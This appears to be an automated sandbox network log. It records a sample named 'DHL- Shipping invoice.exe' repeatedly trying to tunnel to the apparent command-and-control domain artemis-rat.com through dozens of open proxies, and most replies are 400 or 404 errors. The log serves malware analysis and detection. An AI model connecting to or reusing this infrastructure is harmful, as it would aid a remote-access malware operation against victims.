                            Mar 12, 2024 08:37:00.730845928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.006942987 CET176INHTTP/1.1 404 Not Found
                            Content-Type: text/plain; charset=utf-8
                            X-Content-Type-Options: nosniff
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Length: 19
                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                            Data Ascii: 404 page not found


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            463192.168.2.451602172.65.165.93300006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.732019901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            464192.168.2.451617172.67.209.12806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.747589111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.838474035 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            465192.168.2.451623104.19.5.247806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.747589111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.836108923 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            466192.168.2.451616162.159.247.92806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.747868061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.835783005 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            467192.168.2.451460211.222.252.18781936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.747869968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            468192.168.2.45154294.177.106.17823246484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.757617950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            469192.168.2.45170449.51.94.124436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.760565042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            470192.168.2.45170949.51.94.124436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.762371063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            471192.168.2.45171749.51.94.124436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.763657093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            472192.168.2.45171849.51.94.124436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.764965057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            473192.168.2.45075254.37.196.18980806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.766216993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.859678984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.953705072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.062630892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.062889099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            474192.168.2.450597103.163.244.38826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.768654108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.538799047 CET202INHTTP/1.0 404 Not Found
                            Content-Length: 718
                            Content-Type: text/html
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Expires: Tue, 12 Mar 2024 07:37:01 GMT
                            Server: Mikrotik HttpProxy
                            Proxy-Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            475192.168.2.451646172.67.182.77806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.784677982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.873908043 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            476192.168.2.451647104.20.24.214806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.784761906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.873732090 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            477192.168.2.45155391.148.127.16280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.785687923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            478192.168.2.45076972.210.221.19741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.785763979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            479192.168.2.451494103.166.39.936296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.788307905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            480192.168.2.45075185.239.121.16841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.791044950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            481192.168.2.451510106.14.255.124806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.794981003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            482192.168.2.45150714.103.24.2080006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.795557976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            483192.168.2.451591162.214.154.178322106484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.795763969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.234148979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.750307083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.840913057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.879013062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.008958101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.047025919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.140793085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            484192.168.2.45160098.178.72.21109196484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.796207905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            485192.168.2.45160938.156.233.769996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.798285961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.218499899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.749978065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.710918903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.453325033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.765006065 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            486192.168.2.45156845.11.95.16660046484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.798995018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.327877998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.027121067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.343894005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953589916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.562741995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.250106096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.453315973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.934494972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            487192.168.2.4515875.75.200.38806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.799937963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.972130060 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            488192.168.2.45160172.210.221.22341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.800030947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            489192.168.2.451660104.17.171.235806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
